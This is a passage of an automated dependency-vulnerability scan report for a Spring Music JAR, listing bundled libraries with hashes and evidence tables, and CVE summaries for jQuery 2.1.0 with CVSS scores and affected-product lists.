Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: jackson-datatype-joda-2.9.5.jar
Description:
Add-on module for Jackson (http://jackson.codehaus.org) to support
Joda (http://joda-time.sourceforge.net/) data types.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-datatype-joda-2.9.5.jar
MD5: ab7b5f38eb59384993e5e40360fb61aa
SHA1: 1bd3d90b030cd65bef68e6aa8fb01639ff2a516d
SHA256: 9538d51d47158e729fc3bfec018bd454de4231643251e4143c52bb12182f6ee7
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jackson-datatype-joda | High
Vendor | jar | package name | datatype | Highest
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | joda | Highest
Vendor | Manifest | automatic-module-name | com.fasterxml.jackson.datatype.joda | Medium
Vendor | Manifest | bundle-docurl | http://wiki.fasterxml.com/JacksonModuleJoda | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.datatype.jackson-datatype-joda | Medium
Vendor | Manifest | implementation-build-date | 2018-03-26 16:35:14+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.datatype | Medium
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-datatype-joda | Low
Vendor | pom | groupid | com.fasterxml.jackson.datatype | Highest
Vendor | pom | name | Jackson-datatype-Joda | High
Vendor | pom | parent-artifactid | jackson-base | Low
Vendor | pom | parent-groupid | com.fasterxml.jackson | Medium
Vendor | pom | url | http://wiki.fasterxml.com/JacksonModuleJoda | Highest
Product | file | name | jackson-datatype-joda | High
Product | jar | package name | datatype | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | joda | Highest
Product | Manifest | automatic-module-name | com.fasterxml.jackson.datatype.joda | Medium
Product | Manifest | bundle-docurl | http://wiki.fasterxml.com/JacksonModuleJoda | Low
Product | Manifest | Bundle-Name | Jackson-datatype-Joda | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.datatype.jackson-datatype-joda | Medium
Product | Manifest | implementation-build-date | 2018-03-26 16:35:14+0000 | Low
Product | Manifest | Implementation-Title | Jackson-datatype-Joda | High
Product | Manifest | specification-title | Jackson-datatype-Joda | Medium
Product | pom | artifactid | jackson-datatype-joda | Highest
Product | pom | groupid | com.fasterxml.jackson.datatype | Highest
Product | pom | name | Jackson-datatype-Joda | High
Product | pom | parent-artifactid | jackson-base | Medium
Product | pom | parent-groupid | com.fasterxml.jackson | Medium
Product | pom | url | http://wiki.fasterxml.com/JacksonModuleJoda | Medium
Version | file | version | 2.9.5 | High
Version | Manifest | Bundle-Version | 2.9.5 | High
Version | Manifest | Implementation-Version | 2.9.5 | High
Version | pom | version | 2.9.5 | Highest
spring-music-sqldb-1.0.jar: jandex-2.0.3.Final.jar
Description:
Parent POM for JBoss projects. Provides default project build configuration.
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jandex-2.0.3.Final.jar
MD5: 77db6e55da888349f5466d2dcf150b14
SHA1: bfc4d6257dbff7a33a357f0de116be6ff951d849
SHA256: a3a65250cf954f102e74bab23df12540780878231195b585a7a86f4364a53727
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jandex | High
Vendor | hint analyzer | vendor | redhat | Highest
Vendor | jar | package name | indexer | Highest
Vendor | jar | package name | jandex | Highest
Vendor | jar | package name | jboss | Highest
Vendor | Manifest | build-timestamp | Tue, 2 Aug 2016 13:41:44 -0500 | Low
Vendor | Manifest | bundle-docurl | http://www.jboss.org | Low
Vendor | Manifest | bundle-symbolicname | org.jboss.jandex | Medium
Vendor | Manifest | implementation-url | http://www.jboss.org/jandex | Low
Vendor | Manifest | Implementation-Vendor | JBoss by Red Hat | High
Vendor | Manifest | Implementation-Vendor-Id | org.jboss | Medium
Vendor | Manifest | os-arch | x86_64 | Low
Vendor | Manifest | os-name | Mac OS X | Medium
Vendor | Manifest | specification-vendor | JBoss by Red Hat | Low
Vendor | pom | artifactid | jandex | Low
Vendor | pom | groupid | org.jboss | Highest
Vendor | pom | name | Java Annotation Indexer | High
Vendor | pom | parent-artifactid | jboss-parent | Low
Product | file | name | jandex | High
Product | jar | package name | indexer | Highest
Product | jar | package name | jandex | Highest
Product | jar | package name | jboss | Highest
Product | Manifest | build-timestamp | Tue, 2 Aug 2016 13:41:44 -0500 | Low
Product | Manifest | bundle-docurl | http://www.jboss.org | Low
Product | Manifest | Bundle-Name | Java Annotation Indexer | Medium
Product | Manifest | bundle-symbolicname | org.jboss.jandex | Medium
Product | Manifest | Implementation-Title | Java Annotation Indexer | High
Product | Manifest | implementation-url | http://www.jboss.org/jandex | Low
Product | Manifest | os-arch | x86_64 | Low
Product | Manifest | os-name | Mac OS X | Medium
Product | Manifest | specification-title | Java Annotation Indexer | Medium
Product | pom | artifactid | jandex | Highest
Product | pom | groupid | org.jboss | Highest
Product | pom | name | Java Annotation Indexer | High
Product | pom | parent-artifactid | jboss-parent | Medium
Version | Manifest | Bundle-Version | 2.0.3.Final | High
Version | Manifest | Implementation-Version | 2.0.3.Final | High
Version | pom | parent-version | 2.0.3.Final | Low
Version | pom | version | 2.0.3.Final | Highest
spring-music-sqldb-1.0.jar: javassist-3.22.0-GA.jar
Description:
Javassist (JAVA programming ASSISTant) makes Java bytecode manipulation
simple. It is a class library for editing bytecodes in Java.
License:
MPL 1.1: http://www.mozilla.org/MPL/MPL-1.1.html
LGPL 2.1: http://www.gnu.org/licenses/lgpl-2.1.html
Apache License 2.0: http://www.apache.org/licenses/
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/javassist-3.22.0-GA.jar
MD5: 69f277ed4c6631e45ec4cacd0e6e46c6
SHA1: 3e83394258ae2089be7219b971ec21a8288528ad
SHA256: 59531c00f3e3aa1ff48b3a8cf4ead47d203ab0e2fd9e0ad401f764e05947e252
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | javassist | High
Vendor | jar | package name | bytecode | Highest
Vendor | jar | package name | javassist | Highest
Vendor | Manifest | bundle-symbolicname | javassist | Medium
Vendor | Manifest | specification-vendor | Shigeru Chiba, www.javassist.org | Low
Vendor | pom | artifactid | javassist | Low
Vendor | pom | developer email | adinn@redhat.com | Low
Vendor | pom | developer email | chiba@javassist.org | Low
Vendor | pom | developer email | kabir.khan@jboss.com | Low
Vendor | pom | developer email | smarlow@redhat.com | Low
Vendor | pom | developer id | adinn | Medium
Vendor | pom | developer id | chiba | Medium
Vendor | pom | developer id | kabir.khan@jboss.com | Medium
Vendor | pom | developer id | scottmarlow | Medium
Vendor | pom | developer name | Andrew Dinn | Medium
Vendor | pom | developer name | Kabir Khan | Medium
Vendor | pom | developer name | Scott Marlow | Medium
Vendor | pom | developer name | Shigeru Chiba | Medium
Vendor | pom | developer org | JBoss | Medium
Vendor | pom | developer org | The Javassist Project | Medium
Vendor | pom | developer org URL | http://www.javassist.org/ | Medium
Vendor | pom | developer org URL | http://www.jboss.org/ | Medium
Vendor | pom | groupid | org.javassist | Highest
Vendor | pom | name | Javassist | High
Vendor | pom | organization name | Shigeru Chiba, www.javassist.org | High
Vendor | pom | url | http://www.javassist.org/ | Highest
Product | file | name | javassist | High
Product | jar | package name | bytecode | Highest
Product | jar | package name | javassist | Highest
Product | Manifest | Bundle-Name | Javassist | Medium
Product | Manifest | bundle-symbolicname | javassist | Medium
Product | Manifest | specification-title | Javassist | Medium
Product | pom | artifactid | javassist | Highest
Product | pom | developer email | adinn@redhat.com | Low
Product | pom | developer email | chiba@javassist.org | Low
Product | pom | developer email | kabir.khan@jboss.com | Low
Product | pom | developer email | smarlow@redhat.com | Low
Product | pom | developer id | adinn | Low
Product | pom | developer id | chiba | Low
Product | pom | developer id | kabir.khan@jboss.com | Low
Product | pom | developer id | scottmarlow | Low
Product | pom | developer name | Andrew Dinn | Low
Product | pom | developer name | Kabir Khan | Low
Product | pom | developer name | Scott Marlow | Low
Product | pom | developer name | Shigeru Chiba | Low
Product | pom | developer org | JBoss | Low
Product | pom | developer org | The Javassist Project | Low
Product | pom | developer org URL | http://www.javassist.org/ | Low
Product | pom | developer org URL | http://www.jboss.org/ | Low
Product | pom | groupid | org.javassist | Highest
Product | pom | name | Javassist | High
Product | pom | organization name | Shigeru Chiba, www.javassist.org | Low
Product | pom | url | http://www.javassist.org/ | Medium
Version | Manifest | specification-version | 3.22.0-GA | High
Version | pom | version | 3.22.0-GA | Highest
spring-music-sqldb-1.0.jar: javax.annotation-api-1.3.2.jar
Description:
Common Annotations for the JavaTM Platform API
License:
CDDL + GPLv2 with classpath exception: https://github.com/javaee/javax.annotation/blob/master/LICENSE
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/javax.annotation-api-1.3.2.jar
MD5: 2ab1973eefffaa2aeec47d50b9e40b9d
SHA1: 934c04d3cfef185a8008e7bf34331b79730a9d43
SHA256: e04ba5195bcd555dc95650f7cc614d151e4bcd52d29a10b8aa2197f3ab89ab9b
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | javax.annotation-api | High
Vendor | jar | package name | annotation | Highest
Vendor | jar | package name | javax | Highest
Vendor | Manifest | automatic-module-name | java.annotation | Medium
Vendor | Manifest | bundle-docurl | https://javaee.github.io/glassfish | Low
Vendor | Manifest | bundle-symbolicname | javax.annotation-api | Medium
Vendor | Manifest | extension-name | javax.annotation | Medium
Vendor | Manifest | Implementation-Vendor | GlassFish Community | High
Vendor | Manifest | Implementation-Vendor-Id | org.glassfish | Medium
Vendor | Manifest | specification-vendor | Oracle Corporation | Low
Vendor | pom | artifactid | javax.annotation-api | Low
Vendor | pom | developer id | ldemichiel | Medium
Vendor | pom | developer name | Linda De Michiel | Medium
Vendor | pom | developer org | Oracle Corp. | Medium
Vendor | pom | groupid | javax.annotation | Highest
Vendor | pom | name | API | High
Vendor | pom | organization name | GlassFish Community | High
Vendor | pom | organization url | https://javaee.github.io/glassfish | Medium
Vendor | pom | parent-artifactid | jvnet-parent | Low
Vendor | pom | parent-groupid | net.java | Medium
Vendor | pom | url | http://jcp.org/en/jsr/detail?id=250 | Highest
Product | file | name | javax.annotation-api | High
Product | jar | package name | annotation | Highest
Product | jar | package name | javax | Highest
Product | Manifest | automatic-module-name | java.annotation | Medium
Product | Manifest | bundle-docurl | https://javaee.github.io/glassfish | Low
Product | Manifest | Bundle-Name | javax.annotation API | Medium
Product | Manifest | bundle-symbolicname | javax.annotation-api | Medium
Product | Manifest | extension-name | javax.annotation | Medium
Product | pom | artifactid | javax.annotation-api | Highest
Product | pom | developer id | ldemichiel | Low
Product | pom | developer name | Linda De Michiel | Low
Product | pom | developer org | Oracle Corp. | Low
Product | pom | groupid | javax.annotation | Highest
Product | pom | name | API | High
Product | pom | organization name | GlassFish Community | Low
Product | pom | organization url | https://javaee.github.io/glassfish | Low
Product | pom | parent-artifactid | jvnet-parent | Medium
Product | pom | parent-groupid | net.java | Medium
Product | pom | url | http://jcp.org/en/jsr/detail?id=250 | Medium
Version | file | version | 1.3.2 | High
Version | Manifest | Bundle-Version | 1.3.2 | High
Version | Manifest | Implementation-Version | 1.3.2 | High
Version | pom | parent-version | 1.3.2 | Low
Version | pom | version | 1.3.2 | Highest
spring-music-sqldb-1.0.jar: javax.transaction-api-1.2.jar
Description: Project GlassFish Java Transaction API
License: CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/javax.transaction-api-1.2.jar
MD5: 2dfee184286530e726ad155816e15b4c
SHA1: d81aff979d603edd90dcd8db2abc1f4ce6479e3e
SHA256: 9528449583c34d9d63aa1d8d15069790f925ae1f27b33784773b8099eff4c9ff
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | javax.transaction-api | High
Vendor | jar | package name | javax | Highest
Vendor | jar | package name | transaction | Highest
Vendor | Manifest | bundle-docurl | https://glassfish.java.net | Low
Vendor | Manifest | bundle-symbolicname | javax.transaction-api | Medium
Vendor | Manifest | extension-name | javax.transaction | Medium
Vendor | Manifest | Implementation-Vendor | GlassFish Community | High
Vendor | Manifest | Implementation-Vendor-Id | org.glassfish | Medium
Vendor | Manifest | specification-vendor | Oracle Corporation | Low
Vendor | pom | artifactid | javax.transaction-api | Low
Vendor | pom | developer id | paul_parkinson | Medium
Vendor | pom | developer name | Paul Parkinson | Medium
Vendor | pom | developer org | Oracle, Inc. | Medium
Vendor | pom | groupid | javax.transaction | Highest
Vendor | pom | name | API | High
Vendor | pom | organization name | GlassFish Community | High
Vendor | pom | organization url | https://glassfish.java.net | Medium
Vendor | pom | parent-artifactid | jvnet-parent | Low
Vendor | pom | parent-groupid | net.java | Medium
Vendor | pom | url | http://jta-spec.java.net | Highest
Product | file | name | javax.transaction-api | High
Product | jar | package name | javax | Highest
Product | jar | package name | transaction | Highest
Product | Manifest | bundle-docurl | https://glassfish.java.net | Low
Product | Manifest | Bundle-Name | javax.transaction API | Medium
Product | Manifest | bundle-symbolicname | javax.transaction-api | Medium
Product | Manifest | extension-name | javax.transaction | Medium
Product | pom | artifactid | javax.transaction-api | Highest
Product | pom | developer id | paul_parkinson | Low
Product | pom | developer name | Paul Parkinson | Low
Product | pom | developer org | Oracle, Inc. | Low
Product | pom | groupid | javax.transaction | Highest
Product | pom | name | API | High
Product | pom | organization name | GlassFish Community | Low
Product | pom | organization url | https://glassfish.java.net | Low
Product | pom | parent-artifactid | jvnet-parent | Medium
Product | pom | parent-groupid | net.java | Medium
Product | pom | url | http://jta-spec.java.net | Medium
Version | file | version | 1.2 | High
Version | Manifest | Bundle-Version | 1.2 | High
Version | Manifest | Implementation-Version | 1.2 | High
Version | pom | parent-version | 1.2 | Low
Version | pom | version | 1.2 | Highest
spring-music-sqldb-1.0.jar: jboss-logging-3.3.2.Final.jar
Description: The JBoss Logging Framework
License: Apache License, version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jboss-logging-3.3.2.Final.jar
MD5: c397132f958d7e8ac0d566b6723ca7ca
SHA1: 3789d00e859632e6c6206adc0c71625559e6e3b0
SHA256: cb914bfe888da7d9162e965ac8b0d6f28f2f32eca944a00fbbf6dd3cf1aacc13
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jboss-logging | High
Vendor | hint analyzer | vendor | redhat | Highest
Vendor | jar | package name | jboss | Highest
Vendor | jar | package name | logging | Highest
Vendor | Manifest | automatic-module-name | org.jboss.logging | Medium
Vendor | Manifest | build-timestamp | Wed, 14 Feb 2018 13:23:27 -0800 | Low
Vendor | Manifest | bundle-docurl | http://www.jboss.org | Low
Vendor | Manifest | bundle-symbolicname | org.jboss.logging.jboss-logging | Medium
Vendor | Manifest | implementation-url | http://www.jboss.org | Low
Vendor | Manifest | Implementation-Vendor | JBoss by Red Hat | High
Vendor | Manifest | Implementation-Vendor-Id | org.jboss.logging | Medium
Vendor | Manifest | os-arch | amd64 | Low
Vendor | Manifest | os-name | Linux | Medium
Vendor | Manifest | specification-vendor | JBoss by Red Hat | Low
Vendor | pom | artifactid | jboss-logging | Low
Vendor | pom | groupid | org.jboss.logging | Highest
Vendor | pom | name | JBoss Logging 3 | High
Vendor | pom | parent-artifactid | jboss-parent | Low
Vendor | pom | parent-groupid | org.jboss | Medium
Vendor | pom | url | http://www.jboss.org | Highest
Product | file | name | jboss-logging | High
Product | jar | package name | jboss | Highest
Product | jar | package name | logging | Highest
Product | Manifest | automatic-module-name | org.jboss.logging | Medium
Product | Manifest | build-timestamp | Wed, 14 Feb 2018 13:23:27 -0800 | Low
Product | Manifest | bundle-docurl | http://www.jboss.org | Low
Product | Manifest | Bundle-Name | JBoss Logging 3 | Medium
Product | Manifest | bundle-symbolicname | org.jboss.logging.jboss-logging | Medium
Product | Manifest | Implementation-Title | JBoss Logging 3 | High
Product | Manifest | implementation-url | http://www.jboss.org | Low
Product | Manifest | os-arch | amd64 | Low
Product | Manifest | os-name | Linux | Medium
Product | Manifest | specification-title | JBoss Logging 3 | Medium
Product | pom | artifactid | jboss-logging | Highest
Product | pom | groupid | org.jboss.logging | Highest
Product | pom | name | JBoss Logging 3 | High
Product | pom | parent-artifactid | jboss-parent | Medium
Product | pom | parent-groupid | org.jboss | Medium
Product | pom | url | http://www.jboss.org | Medium
Version | Manifest | Bundle-Version | 3.3.2.Final | High
Version | Manifest | Implementation-Version | 3.3.2.Final | High
Version | pom | parent-version | 3.3.2.Final | Low
Version | pom | version | 3.3.2.Final | Highest
spring-music-sqldb-1.0.jar: jcip-annotations-1.0-1.jar
Description: A clean room implementation of the JCIP Annotations based entirely on the specification provided by the javadocs.
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jcip-annotations-1.0-1.jar
MD5: d62dbfa8789378457ada685e2f614846
SHA1: ef31541dd28ae2cefdd17c7ebf352d93e9058c63
SHA256: 4fccff8382aafc589962c4edb262f6aa595e34f1e11e61057d1c6a96e8fc7323
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jcip-annotations | High
Vendor | jar | package name | annotations | Highest
Vendor | jar | package name | annotations | Low
Vendor | jar | package name | jcip | Highest
Vendor | jar | package name | jcip | Low
Vendor | jar | package name | net | Low
Vendor | pom | artifactid | jcip-annotations | Low
Vendor | pom | developer id | stephenc | Medium
Vendor | pom | developer name | Stephen Connolly | Medium
Vendor | pom | groupid | com.github.stephenc.jcip | Highest
Vendor | pom | name | JCIP Annotations under Apache License | High
Vendor | pom | url | http://stephenc.github.com/jcip-annotations | Highest
Product | file | name | jcip-annotations | High
Product | jar | package name | annotations | Highest
Product | jar | package name | annotations | Low
Product | jar | package name | jcip | Highest
Product | jar | package name | jcip | Low
Product | pom | artifactid | jcip-annotations | Highest
Product | pom | developer id | stephenc | Low
Product | pom | developer name | Stephen Connolly | Low
Product | pom | groupid | com.github.stephenc.jcip | Highest
Product | pom | name | JCIP Annotations under Apache License | High
Product | pom | url | http://stephenc.github.com/jcip-annotations | Medium
Version | pom | version | 1.0-1 | Highest
spring-music-sqldb-1.0.jar: joda-time-2.9.9.jar
Description: Date and time library to replace JDK date handling
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/joda-time-2.9.9.jar
MD5: eca438c8cc2b1de38e28d884b7f15dbc
SHA1: f7b520c458572890807d143670c9b24f4de90897
SHA256: b049a43c1057942e6acfbece008e4949b2e35d1658d0c8e06f4485397e2fa4e7
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | joda-time | High
Vendor | jar | package name | joda | Highest
Vendor | jar | package name | time | Highest
Vendor | Manifest | bundle-docurl | http://www.joda.org/joda-time/ | Low
Vendor | Manifest | bundle-symbolicname | joda-time | Medium
Vendor | Manifest | extension-name | joda-time | Medium
Vendor | Manifest | implementation-url | http://www.joda.org/joda-time/ | Low
Vendor | Manifest | Implementation-Vendor | Joda.org | High
Vendor | Manifest | Implementation-Vendor-Id | org.joda | Medium
Vendor | Manifest | specification-vendor | Joda.org | Low
Vendor | pom | artifactid | joda-time | Low
Vendor | pom | developer id | broneill | Medium
Vendor | pom | developer id | jodastephen | Medium
Vendor | pom | developer name | Brian S O'Neill | Medium
Vendor | pom | developer name | Stephen Colebourne | Medium
Vendor | pom | groupid | joda-time | Highest
Vendor | pom | name | Joda-Time | High
Vendor | pom | organization name | Joda.org | High
Vendor | pom | organization url | http://www.joda.org | Medium
Vendor | pom | url | http://www.joda.org/joda-time/ | Highest
Product | file | name | joda-time | High
Product | jar | package name | joda | Highest
Product | jar | package name | time | Highest
Product | Manifest | bundle-docurl | http://www.joda.org/joda-time/ | Low
Product | Manifest | Bundle-Name | Joda-Time | Medium
Product | Manifest | bundle-symbolicname | joda-time | Medium
Product | Manifest | extension-name | joda-time | Medium
Product | Manifest | Implementation-Title | org.joda.time | High
Product | Manifest | implementation-url | http://www.joda.org/joda-time/ | Low
Product | Manifest | specification-title | Joda-Time | Medium
Product | pom | artifactid | joda-time | Highest
Product | pom | developer id | broneill | Low
Product | pom | developer id | jodastephen | Low
Product | pom | developer name | Brian S O'Neill | Low
Product | pom | developer name | Stephen Colebourne | Low
Product | pom | groupid | joda-time | Highest
Product | pom | name | Joda-Time | High
Product | pom | organization name | Joda.org | Low
Product | pom | organization url | http://www.joda.org | Low
Product | pom | url | http://www.joda.org/joda-time/ | Medium
Version | file | version | 2.9.9 | High
Version | Manifest | Bundle-Version | 2.9.9 | High
Version | Manifest | Implementation-Version | 2.9.9 | High
Version | pom | version | 2.9.9 | Highest
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar
Description: WebJar for jQuery
License: MIT License: https://github.com/jquery/jquery/blob/master/MIT-LICENSE.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar
MD5: ba6a537302d2aaaa2d137531c4fc2456
SHA1: 0db1742ea52e14b25b7c4ab39d7a348324241567
SHA256: e97a279de4df230f480a81ac69a82c8aec73970ef152342f332fc2132fff1de1
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jquery | High
Vendor | pom | artifactid | jquery | Low
Vendor | pom | developer email | james@jamesward.org | Low
Vendor | pom | developer id | jamesward | Medium
Vendor | pom | developer name | James Ward | Medium
Vendor | pom | groupid | org.webjars | Highest
Vendor | pom | name | jquery | High
Vendor | pom | url | http://webjars.org | Highest
Product | file | name | jquery | High
Product | pom | artifactid | jquery | Highest
Product | pom | developer email | james@jamesward.org | Low
Product | pom | developer id | jamesward | Low
Product | pom | developer name | James Ward | Low
Product | pom | groupid | org.webjars | Highest
Product | pom | name | jquery | High
Product | pom | url | http://webjars.org | Medium
Version | pom | version | 2.1.0-2 | Highest
CVE-2019-11358 (OSSINDEX)
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2019-11358 for details.
CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: MEDIUM (6.099999904632568)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:jquery:2.1.0-2:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar: jquery.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar/META-INF/resources/webjars/jquery/2.1.0/jquery.js
MD5: 3177091fb9705dd978689ba11bf0609a
SHA1: 0fe3e567e0776226ee98326ba8cae7680683c112
SHA256: 0fa7752926a95e3ab6b5f67a21ef40628ce4447c81ddf4f6cacf663b6fb85af7
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jquery | High
Product | file | name | jquery | High
Version | file | version | 2.1.0 | High
CVE-2015-9251
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1)
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
info - http://research.insecurelabs.org/jquery/test/
info - https://bugs.jquery.com/ticket/11974
info - https://github.com/advisories/GHSA-rmxg-73gg-4p98
info - https://github.com/jquery/jquery/issues/2432
info - https://nvd.nist.gov/vuln/detail/CVE-2015-9251
Vulnerable Software & Versions (NVD):
CVE-2019-11358
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: MEDIUM (6.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
info - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
info - https://nvd.nist.gov/vuln/detail/CVE-2019-11358
Vulnerable Software & Versions (NVD):
cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* 